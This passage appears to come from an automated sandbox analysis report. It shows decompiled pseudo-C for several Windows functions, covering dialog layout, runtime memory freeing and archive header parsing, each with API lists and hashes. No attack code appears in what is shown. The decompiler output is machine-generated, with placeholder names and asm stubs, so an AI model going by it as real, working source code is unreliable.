                                                                            							asm("cdq");
                                                                            							asm("cdq");
                                                                            							 *0x1cdfd0(_t187, 0, (_t193 - (_v2352.right - _t119 % _t174 >> 1) - _v2352.bottom) * _v2368.right / _t174, _t119 / _t174, (_v2320.right - _t193 + 1) * _v2368.right / _v2352.top, (_v2320.bottom - _t170 + 1) * _v2368.top / _t192, 0x204);
                                                                            							_t106 = GetWindow(_t187, 2);
                                                                            							_t187 = _t106;
                                                                            							__eflags = _t187 - _v2384;
                                                                            							if(_t187 == _v2384) {
                                                                            								goto L24;
                                                                            							}
                                                                            							_t157 = _t157 + 1;
                                                                            							__eflags = _t157;
                                                                            						}
                                                                            						goto L24;
                                                                            					}
                                                                            					if(_a12 != 0) {
                                                                            						goto L18;
                                                                            					}
                                                                            					_t158 = 0x64;
                                                                            					asm("cdq");
                                                                            					_t134 = _v2292 * _v2368.top;
                                                                            					_t160 = _t104 * _v2368.right / _t158 + _v2352.right;
                                                                            					_v2324 = _t160;
                                                                            					asm("cdq");
                                                                            					_t185 = _t134 % _v2352.top;
                                                                            					_v2352.left = _t134 / _v2352.top + _t204;
                                                                            					asm("cdq");
                                                                            					asm("cdq");
                                                                            					_t200 = (_t191 - _v2352.left - _t185 >> 1) + _v2336;
                                                                            					_t163 = (_t169 - _t160 - _t185 >> 1) + _v2352.bottom;
                                                                            					if(_t163 < 0) {
                                                                            						_t163 = 0;
                                                                            					}
                                                                            					if(_t200 < 0) {
                                                                            						_t200 = 0;
                                                                            					}
                                                                            					 *0x1cdfd0(_t186, 0, _t163, _t200, _v2324, _v2352.left,  !(GetWindowLongW(_t186, 0xfffffff0) >> 0xa) & 0x00000002 | 0x00000204);
                                                                            					GetWindowRect(_t186,  &_v2368);
                                                                            					_t156 = _v2393;
                                                                            					goto L15;
                                                                            				} else {
                                                                            					_t201 = 0x1cd154;
                                                                            					do {
                                                                            						if( *_t201 > 0) {
                                                                            							_t9 =  &(_t201[1]); // 0x1c33e0
                                                                            							_t150 = E001B5460( &_v2288,  *_t9, _t96);
                                                                            							_t207 = _t207 + 0xc;
                                                                            							if(_t150 == 0) {
                                                                            								_t12 =  &(_t201[1]); // 0x1c33e0
                                                                            								if(E0019CF57(_t155, _t202, _t201,  *_t12,  &_v2048, 0x400) != 0) {
                                                                            									SetDlgItemTextW(_t186,  *_t201,  &_v2048);
                                                                            								}
                                                                            							}
                                                                            							_t96 = _v2368.top;
                                                                            						}
                                                                            						_t155 = _t155 + 1;
                                                                            						_t201 =  &(_t201[3]);
                                                                            						_t213 = _t155 -  *0x1cd5f4; // 0x63
                                                                            					} while (_t213 < 0);
                                                                            					goto L8;
                                                                            				}
                                                                            			}
                                                                            0x0019d7c0
                                                                            0x0019d7c0
                                                                            0x00000000
                                                                            0x0019d772

                                                                            APIs
                                                                            • _swprintf.LIBCMT ref: 0019D731
                                                                              • Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54
                                                                              • Part of subcall function 001A11FA: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,001D0078,?,0019CE91,00000000,?,00000050,001D0078), ref: 001A1217
                                                                            • _strlen.LIBCMT ref: 0019D752
                                                                            • SetDlgItemTextW.USER32(?,001CD154,?), ref: 0019D7B2
                                                                            • GetWindowRect.USER32(?,?), ref: 0019D7EC
                                                                            • GetClientRect.USER32(?,?), ref: 0019D7F8
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0019D896
                                                                            • GetWindowRect.USER32(?,?), ref: 0019D8C3
                                                                            • SetWindowTextW.USER32(?,?), ref: 0019D906
                                                                            • GetSystemMetrics.USER32(00000008), ref: 0019D90E
                                                                            • GetWindow.USER32(?,00000005), ref: 0019D919
                                                                            • GetWindowRect.USER32(00000000,?), ref: 0019D946
                                                                            • GetWindow.USER32(00000000,00000002), ref: 0019D9B8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                                            • String ID: $%s:$CAPTION$d
                                                                            • API String ID: 2407758923-2512411981
                                                                            • Opcode ID: ccc7566c2707d206c9ba24c6616f181b0597281feffb1b12d143780c790b46df
                                                                            • Instruction ID: afa1dc89bc43ba8809cd4f407a07ddd1fefeae6021d9b6459f25020fb44cecb6
                                                                            • Opcode Fuzzy Hash: ccc7566c2707d206c9ba24c6616f181b0597281feffb1b12d143780c790b46df
                                                                            • Instruction Fuzzy Hash: E9818E72508341AFDB10DFA8ED85F6FBBE9EB88704F04092DFA8593291D770E8058B52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001BB784(intOrPtr _a4) {
                                                                            				intOrPtr _v8;
                                                                            				intOrPtr _t25;
                                                                            				intOrPtr* _t26;
                                                                            				intOrPtr _t28;
                                                                            				intOrPtr* _t29;
                                                                            				intOrPtr* _t31;
                                                                            				intOrPtr* _t45;
                                                                            				intOrPtr* _t46;
                                                                            				intOrPtr* _t47;
                                                                            				intOrPtr* _t55;
                                                                            				intOrPtr* _t70;
                                                                            				intOrPtr _t74;
                                                                            
                                                                            				_t74 = _a4;
                                                                            				_t25 =  *((intOrPtr*)(_t74 + 0x88));
                                                                            				if(_t25 != 0 && _t25 != 0x1cdd50) {
                                                                            					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
                                                                            					if(_t45 != 0 &&  *_t45 == 0) {
                                                                            						_t46 =  *((intOrPtr*)(_t74 + 0x84));
                                                                            						if(_t46 != 0 &&  *_t46 == 0) {
                                                                            							E001B7A50(_t46);
                                                                            							E001BB363( *((intOrPtr*)(_t74 + 0x88)));
                                                                            						}
                                                                            						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                            						if(_t47 != 0 &&  *_t47 == 0) {
                                                                            							E001B7A50(_t47);
                                                                            							E001BB461( *((intOrPtr*)(_t74 + 0x88)));
                                                                            						}
                                                                            						E001B7A50( *((intOrPtr*)(_t74 + 0x7c)));
                                                                            						E001B7A50( *((intOrPtr*)(_t74 + 0x88)));
                                                                            					}
                                                                            				}
                                                                            				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                            				if(_t26 != 0 &&  *_t26 == 0) {
                                                                            					E001B7A50( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                            					E001B7A50( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                            					E001B7A50( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                            					E001B7A50( *((intOrPtr*)(_t74 + 0x8c)));
                                                                            				}
                                                                            				E001BB8F7( *((intOrPtr*)(_t74 + 0x9c)));
                                                                            				_t28 = 6;
                                                                            				_t55 = _t74 + 0xa0;
                                                                            				_v8 = _t28;
                                                                            				_t70 = _t74 + 0x28;
                                                                            				do {
                                                                            					if( *((intOrPtr*)(_t70 - 8)) != 0x1cd818) {
                                                                            						_t31 =  *_t70;
                                                                            						if(_t31 != 0 &&  *_t31 == 0) {
                                                                            							E001B7A50(_t31);
                                                                            							E001B7A50( *_t55);
                                                                            						}
                                                                            						_t28 = _v8;
                                                                            					}
                                                                            					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                            						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                            						if(_t29 != 0 &&  *_t29 == 0) {
                                                                            							E001B7A50(_t29);
                                                                            						}
                                                                            						_t28 = _v8;
                                                                            					}
                                                                            					_t55 = _t55 + 4;
                                                                            					_t70 = _t70 + 0x10;
                                                                            					_t28 = _t28 - 1;
                                                                            					_v8 = _t28;
                                                                            				} while (_t28 != 0);
                                                                            				return E001B7A50(_t74);
                                                                            			}

                                                                            APIs
                                                                            • ___free_lconv_mon.LIBCMT ref: 001BB7C8
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB380
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB392
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3A4
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3B6
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3C8
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3DA
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3EC
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB3FE
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB410
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB422
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB434
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB446
                                                                              • Part of subcall function 001BB363: _free.LIBCMT ref: 001BB458
                                                                            • _free.LIBCMT ref: 001BB7BD
                                                                              • Part of subcall function 001B7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?), ref: 001B7A66
                                                                              • Part of subcall function 001B7A50: GetLastError.KERNEL32(?,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?,?), ref: 001B7A78
                                                                            • _free.LIBCMT ref: 001BB7DF
                                                                            • _free.LIBCMT ref: 001BB7F4
                                                                            • _free.LIBCMT ref: 001BB7FF
                                                                            • _free.LIBCMT ref: 001BB821
                                                                            • _free.LIBCMT ref: 001BB834
                                                                            • _free.LIBCMT ref: 001BB842
                                                                            • _free.LIBCMT ref: 001BB84D
                                                                            • _free.LIBCMT ref: 001BB885
                                                                            • _free.LIBCMT ref: 001BB88C
                                                                            • _free.LIBCMT ref: 001BB8A9
                                                                            • _free.LIBCMT ref: 001BB8C1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                            • String ID:
                                                                            • API String ID: 161543041-0
                                                                            • Opcode ID: ed87088c743111e308c38677a5d7d4ec174a644b793c54a538ef62f9b31cd17e
                                                                            • Instruction ID: 0f26012a9ff03bbd2029ea5762c57d5c50b7f450e0145dcc5cd44fe114a600ce
                                                                            • Opcode Fuzzy Hash: ed87088c743111e308c38677a5d7d4ec174a644b793c54a538ef62f9b31cd17e
                                                                            • Instruction Fuzzy Hash: C2316D316087009FEB20AA79D885BDBB3E8EF90350F145429F05AE7591DFB1ED80CB24
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001AC343(void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4) {
                                                                            				intOrPtr _v20;
                                                                            				intOrPtr _v24;
                                                                            				void _v28;
                                                                            				short _v4124;
                                                                            				void* _t10;
                                                                            				struct HWND__* _t11;
                                                                            				void* _t21;
                                                                            				void* _t28;
                                                                            				void* _t29;
                                                                            				void* _t31;
                                                                            				struct HWND__* _t34;
                                                                            				void* _t45;
                                                                            
                                                                            				_t45 = __fp0;
                                                                            				_t29 = __edx;
                                                                            				E001AD940();
                                                                            				_t10 = E001A952A(__eflags);
                                                                            				if(_t10 == 0) {
                                                                            					return _t10;
                                                                            				}
                                                                            				_t11 = GetWindow(_a4, 5);
                                                                            				_t34 = _t11;
                                                                            				_t31 = 0;
                                                                            				_a4 = _t34;
                                                                            				if(_t34 == 0) {
                                                                            					L11:
                                                                            					return _t11;
                                                                            				}
                                                                            				while(_t31 < 0x200) {
                                                                            					GetClassNameW(_t34,  &_v4124, 0x800);
                                                                            					if(E001A1410( &_v4124, L"STATIC") == 0 && (GetWindowLongW(_t34, 0xfffffff0) & 0x0000001f) == 0xe) {
                                                                            						_t28 = SendMessageW(_t34, 0x173, 0, 0);
                                                                            						if(_t28 != 0) {
                                                                            							GetObjectW(_t28, 0x18,  &_v28);
                                                                            							_t21 = E001A958C(_v20);
                                                                            							SendMessageW(_t34, 0x172, 0, E001A975D(_t29, _t45, _t28, E001A9549(_v24), _t21));
                                                                            							DeleteObject(_t28);
                                                                            						}
                                                                            					}
                                                                            					_t11 = GetWindow(_t34, 2);
                                                                            					_t34 = _t11;
                                                                            					if(_t34 != _a4) {
                                                                            						_t31 = _t31 + 1;
                                                                            						if(_t34 != 0) {
                                                                            							continue;
                                                                            						}
                                                                            					}
                                                                            					break;
                                                                            				}
                                                                            				goto L11;
                                                                            			}

                                                                            APIs
                                                                            • GetWindow.USER32(?,00000005), ref: 001AC364
                                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 001AC393
                                                                              • Part of subcall function 001A1410: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0019ACFE,?,?,?,0019ACAD,?,-00000002,?,00000000,?), ref: 001A1426
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 001AC3B1
                                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 001AC3C8
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 001AC3DB
                                                                              • Part of subcall function 001A958C: GetDC.USER32(00000000), ref: 001A9598
                                                                              • Part of subcall function 001A958C: GetDeviceCaps.GDI32(00000000,0000005A), ref: 001A95A7
                                                                              • Part of subcall function 001A958C: ReleaseDC.USER32(00000000,00000000), ref: 001A95B5
                                                                              • Part of subcall function 001A9549: GetDC.USER32(00000000), ref: 001A9555
                                                                              • Part of subcall function 001A9549: GetDeviceCaps.GDI32(00000000,00000058), ref: 001A9564
                                                                              • Part of subcall function 001A9549: ReleaseDC.USER32(00000000,00000000), ref: 001A9572
                                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 001AC402
                                                                            • DeleteObject.GDI32(00000000), ref: 001AC409
                                                                            • GetWindow.USER32(00000000,00000002), ref: 001AC412
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Window$CapsDeviceMessageObjectReleaseSend$ClassCompareDeleteLongNameString
                                                                            • String ID: STATIC
                                                                            • API String ID: 1444658586-1882779555
                                                                            • Opcode ID: 5b66441cb51f1f3c2f01ce75b62a65a38e4b276d19edfcd99f4eeef621775f02
                                                                            • Instruction ID: 33b85bd8395a0e3c7c5173545bf91acdadeb07aaae74dedbfecb7476298470f1
                                                                            • Opcode Fuzzy Hash: 5b66441cb51f1f3c2f01ce75b62a65a38e4b276d19edfcd99f4eeef621775f02
                                                                            • Instruction Fuzzy Hash: 4821D8765402147BEB216B64DC56FEF7B6CAF1A710F008021FA01B6091CB748E8287E4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E001B8422(char _a4) {
                                                                            				char _v8;
                                                                            
                                                                            				_t26 = _a4;
                                                                            				_t52 =  *_a4;
                                                                            				if( *_a4 != 0x1c4be0) {
                                                                            					E001B7A50(_t52);
                                                                            					_t26 = _a4;
                                                                            				}
                                                                            				E001B7A50( *((intOrPtr*)(_t26 + 0x3c)));
                                                                            				E001B7A50( *((intOrPtr*)(_a4 + 0x30)));
                                                                            				E001B7A50( *((intOrPtr*)(_a4 + 0x34)));
                                                                            				E001B7A50( *((intOrPtr*)(_a4 + 0x38)));
                                                                            				E001B7A50( *((intOrPtr*)(_a4 + 0x28)));
                                                                            				E001B7A50( *((intOrPtr*)(_a4 + 0x2c)));
                                                                            				E001B7A50( *((intOrPtr*)(_a4 + 0x40)));
                                                                            				E001B7A50( *((intOrPtr*)(_a4 + 0x44)));
                                                                            				E001B7A50( *((intOrPtr*)(_a4 + 0x360)));
                                                                            				_v8 =  &_a4;
                                                                            				E001B82E8(5,  &_v8);
                                                                            				_v8 =  &_a4;
                                                                            				return E001B8338(4,  &_v8);
                                                                            			}





                                                                            APIs
                                                                            • _free.LIBCMT ref: 001B8436
                                                                              • Part of subcall function 001B7A50: RtlFreeHeap.NTDLL(00000000,00000000,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?), ref: 001B7A66
                                                                              • Part of subcall function 001B7A50: GetLastError.KERNEL32(?,?,001BB4F8,?,00000000,?,00000000,?,001BB51F,?,00000007,?,?,001BB91C,?,?), ref: 001B7A78
                                                                            • _free.LIBCMT ref: 001B8442
                                                                            • _free.LIBCMT ref: 001B844D
                                                                            • _free.LIBCMT ref: 001B8458
                                                                            • _free.LIBCMT ref: 001B8463
                                                                            • _free.LIBCMT ref: 001B846E
                                                                            • _free.LIBCMT ref: 001B8479
                                                                            • _free.LIBCMT ref: 001B8484
                                                                            • _free.LIBCMT ref: 001B848F
                                                                            • _free.LIBCMT ref: 001B849D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true
                                                                            • Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp
                                                                            • Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                            • String ID:
                                                                            • API String ID: 776569668-0
                                                                            • Opcode ID: 11013c8a1fa14b2dc38f7073fdd6fd4b0a88d97011bfbc6aade75d4694ed5b9a
                                                                            • Instruction ID: 99f814d0cc728107abc8b67113c85093a65bf6a328fb45aa96599089d5bbffb7
                                                                            • Opcode Fuzzy Hash: 11013c8a1fa14b2dc38f7073fdd6fd4b0a88d97011bfbc6aade75d4694ed5b9a
                                                                            • Instruction Fuzzy Hash: F211A276104108EFCB41EFB4C882DDE3BA9EF54350B4591A5FA199B2A2DB31EF50DB80
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 93%
                                                                            			E0019200C(intOrPtr __ecx) {
                                                                            				signed int _t135;
                                                                            				void* _t137;
                                                                            				signed int _t139;
                                                                            				unsigned int _t140;
                                                                            				signed int _t144;
                                                                            				signed int _t161;
                                                                            				signed int _t164;
                                                                            				void* _t167;
                                                                            				void* _t172;
                                                                            				signed int _t175;
                                                                            				signed char _t178;
                                                                            				signed char _t179;
                                                                            				signed char _t180;
                                                                            				signed int _t182;
                                                                            				signed int _t185;
                                                                            				signed int _t187;
                                                                            				signed int _t188;
                                                                            				signed char _t220;
                                                                            				signed char _t232;
                                                                            				signed int _t233;
                                                                            				signed int _t236;
                                                                            				intOrPtr _t240;
                                                                            				signed int _t244;
                                                                            				signed int _t246;
                                                                            				signed int _t247;
                                                                            				signed int _t257;
                                                                            				signed int _t258;
                                                                            				signed char _t262;
                                                                            				signed int _t263;
                                                                            				signed int _t265;
                                                                            				intOrPtr _t272;
                                                                            				intOrPtr _t275;
                                                                            				intOrPtr _t278;
                                                                            				intOrPtr _t314;
                                                                            				signed int _t315;
                                                                            				intOrPtr _t318;
                                                                            				signed int _t322;
                                                                            				void* _t323;
                                                                            				void* _t324;
                                                                            				void* _t326;
                                                                            				void* _t327;
                                                                            				void* _t328;
                                                                            				void* _t329;
                                                                            				void* _t330;
                                                                            				void* _t331;
                                                                            				void* _t332;
                                                                            				void* _t333;
                                                                            				void* _t334;
                                                                            				intOrPtr* _t336;
                                                                            				signed int _t339;
                                                                            				void* _t340;
                                                                            				signed int _t341;
                                                                            				char* _t342;
                                                                            				void* _t343;
                                                                            				void* _t344;
                                                                            				signed int _t348;
                                                                            				signed int _t351;
                                                                            				signed int _t366;
                                                                            
                                                                            				E001AD940();
                                                                            				_t318 =  *((intOrPtr*)(_t344 + 0x20b8));
                                                                            				 *((intOrPtr*)(_t344 + 0xc)) = __ecx;
                                                                            				_t314 =  *((intOrPtr*)(_t318 + 0x18));
                                                                            				_t135 = _t314 -  *((intOrPtr*)(_t344 + 0x20bc));
                                                                            				if(_t135 <  *(_t318 + 0x1c)) {
                                                                            					L104:
                                                                            					return _t135;
                                                                            				}
                                                                            				_t315 = _t314 - _t135;
                                                                            				 *(_t318 + 0x1c) = _t135;
                                                                            				if(_t315 >= 2) {
                                                                            					_t240 =  *((intOrPtr*)(_t344 + 0x20c4));
                                                                            					while(1) {
                                                                            						_t135 = E0019C39E(_t315);
                                                                            						_t244 = _t135;
                                                                            						_t348 = _t315;
                                                                            						if(_t348 < 0 || _t348 <= 0 && _t244 == 0) {
                                                                            							break;
                                                                            						}
                                                                            						_t322 =  *(_t318 + 0x1c);
                                                                            						_t135 =  *((intOrPtr*)(_t318 + 0x18)) - _t322;
                                                                            						if(_t135 == 0) {
                                                                            							break;
                                                                            						}
                                                                            						_t351 = _t315;
                                                                            						if(_t351 > 0 || _t351 >= 0 && _t244 > _t135) {
                                                                            							break;
                                                                            						} else {
                                                                            							_t339 = _t322 + _t244;
                                                                            							 *(_t344 + 0x28) = _t339;
                                                                            							_t137 = E0019C39E(_t315);
                                                                            							_t340 = _t339 -  *(_t318 + 0x1c);
                                                                            							_t323 = _t137;
                                                                            							_t135 = _t315;
                                                                            							_t246 = 0;
                                                                            							 *(_t344 + 0x24) = _t135;
                                                                            							 *(_t344 + 0x20) = 0;
                                                                            							if(0 < 0 || 0 <= 0 && _t340 < 0) {
                                                                            								break;
                                                                            							} else {
                                                                            								if( *((intOrPtr*)(_t240 + 4)) == 1 && _t323 == 1 && _t135 == 0) {
                                                                            									 *((char*)(_t240 + 0x1e)) = 1;
                                                                            									_t232 = E0019C39E(_t315);
                                                                            									 *(_t344 + 0x1c) = _t232;
                                                                            									if((_t232 & 0x00000001) != 0) {
                                                                            										_t236 = E0019C39E(_t315);
                                                                            										if((_t236 | _t315) != 0) {
                                                                            											asm("adc eax, edx");
                                                                            											 *((intOrPtr*)(_t240 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t236;
                                                                            											 *((intOrPtr*)(_t240 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
                                                                            										}
                                                                            										_t232 =  *(_t344 + 0x1c);
                                                                            									}
                                                                            									if((_t232 & 0x00000002) != 0) {
                                                                            										_t233 = E0019C39E(_t315);
                                                                            										if((_t233 | _t315) != 0) {
                                                                            											asm("adc eax, edx");
                                                                            											 *((intOrPtr*)(_t240 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca0)) + _t233;
                                                                            											 *((intOrPtr*)(_t240 + 0x34)) =  *((intOrPtr*)( *((intOrPtr*)(_t344 + 0x18)) + 0x6ca4));
                                                                            										}
                                                                            									}
                                                                            									_t246 =  *(_t344 + 0x20);
                                                                            									_t135 =  *(_t344 + 0x24);
                                                                            								}
                                                                            								if( *((intOrPtr*)(_t240 + 4)) == 2 ||  *((intOrPtr*)(_t240 + 4)) == 3) {
                                                                            									_t366 = _t135;
                                                                            									if(_t366 > 0 || _t366 >= 0 && _t323 > 7) {
                                                                            										goto L102;
                                                                            									} else {
                                                                            										_t324 = _t323 - 1;
                                                                            										if(_t324 == 0) {
                                                                            											_t139 = E0019C39E(_t315);
                                                                            											__eflags = _t139;
                                                                            											if(_t139 == 0) {
                                                                            												_t140 = E0019C39E(_t315);
                                                                            												 *(_t240 + 0x10c1) = _t140 & 0x00000001;
                                                                            												 *(_t240 + 0x10ca) = _t140 >> 0x00000001 & 0x00000001;
                                                                            												_t144 = E0019C251(_t318) & 0x000000ff;
                                                                            												 *(_t240 + 0x10ec) = _t144;
                                                                            												__eflags = _t144 - 0x18;
                                                                            												if(_t144 > 0x18) {
                                                                            													E00193E41(_t344 + 0x38, 0x14, L"xc%u", _t144);
                                                                            													_t257 =  *(_t344 + 0x28);
                                                                            													_t167 = _t344 + 0x40;
                                                                            													_t344 = _t344 + 0x10;
                                                                            													E00193DEC(_t257, _t240 + 0x28, _t167);
                                                                            												}
                                                                            												E0019C300(_t318, _t240 + 0x10a1, 0x10);
                                                                            												E0019C300(_t318, _t240 + 0x10b1, 0x10);
                                                                            												__eflags =  *(_t240 + 0x10c1);
                                                                            												if( *(_t240 + 0x10c1) != 0) {
                                                                            													_t325 = _t240 + 0x10c2;
                                                                            													E0019C300(_t318, _t240 + 0x10c2, 8);
                                                                            													E0019C300(_t318, _t344 + 0x30, 4);
                                                                            													E0019F524(_t344 + 0x58);
                                                                            													E0019F56A(_t344 + 0x60, _t240 + 0x10c2, 8);
                                                                            													_push(_t344 + 0x30);
                                                                            													E0019F435(_t344 + 0x5c);
                                                                            													_t161 = E001AF3CA(_t344 + 0x34, _t344 + 0x34, 4);
                                                                            													_t344 = _t344 + 0xc;
                                                                            													asm("sbb al, al");
                                                                            													__eflags =  *((intOrPtr*)(_t240 + 4)) - 3;
                                                                            													 *(_t240 + 0x10c1) =  ~_t161 + 1;
                                                                            													if( *((intOrPtr*)(_t240 + 4)) == 3) {
                                                                            														_t164 = E001AF3CA(_t325, 0x1c2398, 8);
                                                                            														_t344 = _t344 + 0xc;
                                                                            														__eflags = _t164;
                                                                            														if(_t164 == 0) {
                                                                            															 *(_t240 + 0x10c1) = _t164;
                                                                            														}
                                                                            													}
                                                                            												}
                                                                            												 *((char*)(_t240 + 0x10a0)) = 1;
                                                                            												 *((intOrPtr*)(_t240 + 0x109c)) = 5;
                                                                            												 *((char*)(_t240 + 0x109b)) = 1;
                                                                            											} else {
                                                                            												E00193E41(_t344 + 0x38, 0x14, L"x%u", _t139);
                                                                            												_t258 =  *(_t344 + 0x28);
                                                                            												_t172 = _t344 + 0x40;
                                                                            												_t344 = _t344 + 0x10;
                                                                            												E00193DEC(_t258, _t240 + 0x28, _t172);
                                                                            											}
                                                                            											goto L102;
                                                                            										}
                                                                            										_t326 = _t324 - 1;
                                                                            										if(_t326 == 0) {
                                                                            											_t175 = E0019C39E(_t315);
                                                                            											__eflags = _t175;
                                                                            											if(_t175 != 0) {
                                                                            												goto L102;
                                                                            											}
                                                                            											_push(0x20);
                                                                            											 *((intOrPtr*)(_t240 + 0x1070)) = 3;
                                                                            											_push(_t240 + 0x1074);
                                                                            											L40:
                                                                            											E0019C300(_t318);
                                                                            											goto L102;
                                                                            										}
                                                                            										_t327 = _t326 - 1;
                                                                            										if(_t327 == 0) {
                                                                            											__eflags = _t246;
                                                                            											if(__eflags < 0) {
                                                                            												goto L102;
                                                                            											}
                                                                            											if(__eflags > 0) {
                                                                            												L65:
                                                                            												_t178 = E0019C39E(_t315);
                                                                            												 *(_t344 + 0x13) = _t178;
                                                                            												_t179 = _t178 & 0x00000001;
                                                                            												_t262 =  *(_t344 + 0x13);
                                                                            												 *(_t344 + 0x14) = _t179;
                                                                            												_t315 = _t262 & 0x00000002;
                                                                            												__eflags = _t315;
                                                                            												 *(_t344 + 0x15) = _t315;
                                                                            												if(_t315 != 0) {
                                                                            													_t278 = _t318;
                                                                            													__eflags = _t179;
                                                                            													if(__eflags == 0) {
                                                                            														E001A0A64(_t240 + 0x1040, _t315, E0019C2E0(_t278, __eflags), _t315);
                                                                            													} else {
                                                                            														E001A0A25(_t240 + 0x1040, _t315, E0019C29E(_t278), 0);
                                                                            													}
                                                                            													_t262 =  *(_t344 + 0x13);
                                                                            													_t179 =  *(_t344 + 0x14);
                                                                            												}
                                                                            												_t263 = _t262 & 0x00000004;
                                                                            												__eflags = _t263;
                                                                            												 *(_t344 + 0x16) = _t263;
                                                                            												if(_t263 != 0) {
                                                                            													_t275 = _t318;
                                                                            													__eflags = _t179;
                                                                            													if(__eflags == 0) {
                                                                            														E001A0A64(_t240 + 0x1048, _t315, E0019C2E0(_t275, __eflags), _t315);
                                                                            													} else {
                                                                            														E001A0A25(_t240 + 0x1048, _t315, E0019C29E(_t275), 0);
                                                                            													}
